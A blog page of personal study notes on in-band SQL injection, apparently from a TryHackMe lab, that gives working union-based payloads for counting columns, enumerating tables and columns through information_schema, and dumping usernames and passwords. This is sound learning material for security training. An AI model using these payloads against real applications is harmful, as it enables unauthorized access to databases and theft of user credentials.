Meitoka blog
  • 👋About Me
  • ☢️Malware Development (crow)
    • Process, Thread & Handler
  • 🚩TryHackMe stuffs
    • Walkthroughs
      • 🔟OWASP Top 10
      • SSRF
      • Buffer Overflow
    • Challenges (CTF)
      • ♟️Publisher
      • 🐰Wonderland
  • 🌋VULNLAB
    • Machines
      • 🐈Baby
      • 🎧Data
  • 🧠LEARNING
    • 💉SQLi
      • 📜SQLmap quick cheat sheet
      • ➡️In-Band SQLi
      • Inferential (Blind) SQL Injection
      • ⚠️SQLi warning
Powered by GitBook
On this page
  1. LEARNING
  2. SQLi

In-Band SQLi

2 types:

  • Error-Based SQLi

  • Union-Based SQLi

Example for an Union-Based SQLi:

  1. Try to find how many columns the original SELECT query return

    1 UNION SELECT 1→ error

    1 UNION SELECT 1,2→ error

    1 UNION SELECT 1,2,3→ success!

    So, in this case, we have 3 columns

  2. If the result is only one the first one, do this: 0 UNION SELECT 1,2,3

  3. Get the database name

    0 UNION SELECT 1,2,database()

  4. And so on with tables and columns that are in the founded database

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'

  1. Finally, concat every columns you want the result to dump values

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
PreviousSQLmap quick cheat sheetNextInferential (Blind) SQL Injection

Last updated 1 month ago

🧠
💉
➡️
  • 2 types:
  • Example for an Union-Based SQLi: